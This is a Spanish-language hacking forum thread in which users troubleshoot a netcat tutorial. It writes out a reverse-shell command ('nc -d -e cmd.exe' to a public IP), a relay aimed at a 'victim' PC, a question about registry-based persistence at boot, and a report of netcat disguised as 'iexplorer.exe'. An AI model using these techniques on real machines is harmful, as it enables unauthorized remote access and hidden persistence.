Tema destacado: ¡Aprende hacking con práctica! - arZone, el wargame de elhacker.net
Autor
|
Tema: Jugando con netcat (Leído 153,369 veces)
|
carlipus
|
Lo hago desde mi pc los 2 comandos.
En una ventana msdos pongo nc -vv -L -p 6000
En la otra nc -d -e cmd.exe miipPUBLICA 6000
Deberia conectar, no?
Si en cambio hago el mismo proceso pero en vez de ip publica, la ip privada(192.168.xxxx) si que conecta.
Por eso creo que aunque lo probara desde otro ordenador no conectaria el exterior a mi netcat a la escucha.
|
|
|
|
|
|
|
|
|
|
zhyzura
|
pregunta...
ya mapeaste(o redireccionaste) los puertos de tu router??
cuando usas la ip de tu red te funciona por que estas conectado directamente, pero al hacerlo atravez de tu ip publica lo que haces es conectarte a quien tiene dicha ip que en este caso no es tu equipo sino mas bien el router que te da la conexion a internet(de alli la razon de tener que redireccionar los puertos en tu router) para que cuando tu router reciba una peticion en el puerto 6000 la envie a tu equipo.
saludos
|
|
|
|
|
|
|
|
|
carlipus
|
Si claro que lo mapee...pero sigue sin funcionar....no se que puede ser
|
|
|
|
|
|
|
|
|
|
|
zcirokoko4566
|
Ayuda...
|
|
|
|
« Última modificación: 11 Julio 2011, 20:47 por zcirokoko4566 »
|
|
|
|
|
zcirokoko4566
|
Saludos... tengo un problema con el NetCat sucede que no puedo conectar a una shell con IP privada.. la sintaxis seria: mi PC: nc -vvlp 12345 "Modo escucha..." PC victima: nc -g (ip-publica) (ip privada) (12345) pero no conecta.. son nuevo en esto... alguna solucion... 
|
|
|
|
|
|
|
|
|
bravo1979
|
Hola como estas, disculpa pero necesito que me ayudes recien empiezo con esto y no quiero quedarme a medias, estoy haciendo tu ejercicio de la parte 1 y tengo unas dudas. termine con exito lo del winrar, pero no entiendo eso de crear ahora el cliente, lo que ejecutas es el D.O.S o es el nc? por q no me sale si ejecuto el D.O.S con la raiz de windows y hago esa sentencia me sale q no se reconoce como un comando interno ni externo y si lo hago del nc q creo q no lo haces no sucede nada. puedes explicarmelo por favor? y podrias subir nuevamente el video q ya no funciona,. gracias espero tu pronta respuesta, quisiera resolver esto para seguir con los otros ejercicios t dejo mi email es oscar_ch.b@hotmail.com 
|
|
|
|
|
|
|
|
|
darckz
soy hacker (aprendiz de hacker)
|
MUY BUENO QUE LASTIMA QUE TENGA QUE VER LAS IMAGENES POR SEPARADO 
|
|
|
|
« Última modificación: 10 Diciembre 2011, 05:30 por darckz »
|
|
firma: mmmmmmh nose xD
no jodaz boludo
(xD)
|
|
|
WHK
吴阿卡
Ex-Staff
The Hacktivism is not a crime
|
MUY BUENO QUE LASTIMA QUE TENGA QUE VER LAS IMAGENES POR SEPARADO  Acabo de modificar los enlaces de las imágenes, ahora si se pueden ver nuevamente  Saludos.
|
|
|
|
|
|
|
|
|
tornadeitor
|
Hola, estoy iniciándome en este programa y tenía una duda que espero puedan resolverme:
¿Hay algún método para modificar el registro de un Windows Vista y Seven y así que se ejecute el NetCat en cada inicio del sistema? He visto que para XP se puede hacer un batch, pero este no funciona en Vista y Seven ya que estos piden permiso de Administrador. He estado buscando información sobre ello pero no encuentro nada por Google.
Un saludo.
|
|
|
|
|
|
|
|
|
kAl35K1Ng
|
tengo el mismo problema que carlipus, antes de todo, estoi ausando puerto 80 y 25, por lo tanto en teoria no tendria que abrir los puertos pero aun asi los abro y los compruevo con http://www.canyouseeme.org/ y me sale succesfull los dos puertos asi que creo que tema de puertos no es el problema. Aora explico mas detallado mi problema, he echo el 1º ejerciciion aunk no exactamente, e cojido variaciones e metido un bat y e echo otras cosas, en direccion local me sale todo perfecto y con la direccion publica se me queda escuchando los puertos, no se si el problema es porque escucho los puertos y los abro con el mismo pc pero k tengan claro k problema de antivirus no es pork no tengo ^^, aver si pueden ayudarme, pork e leido k ai k acer algo con el no-ip o algo de eso.. gracias de antemano, y buen tuto
|
|
|
|
|
|
|
|
|
kitell
|
Hola mira estuve haciendo todo los pasos y me sale el tipico error h_errno 11001: HOST_NOT_FOUND.
A la solucion, no encuentro otro netcat por la red.
Despues, lo abri yo mismo para probarlo y ahora cada vez que enciendo el pc sale la ventana de cmd y se cierra rapido.
Entre en el registro, run. pero no sale las entradas que yo puse.
Donde se guardo eso para que cada vez que encienda salte el programa?
Edito: la ventada ms dos que salia estaba abriendome la ruta: C:\users\NOMBRE\update\iexplorer.exe (el netcat)
Lo elimine y ya no sale mas la ventana.
|
|
|
|
« Última modificación: 12 Febrero 2012, 17:14 por kitell »
|
|
|
|
|
Lepattan
|
Eso es el caso de W2, pero como algunos habremos, ¿qué pasa con la sintáxis para usuarios Linux, llámese Ubuntu, Fedora, o cualquier distro?
|
|
|
|
|
|
|
|
|
|
|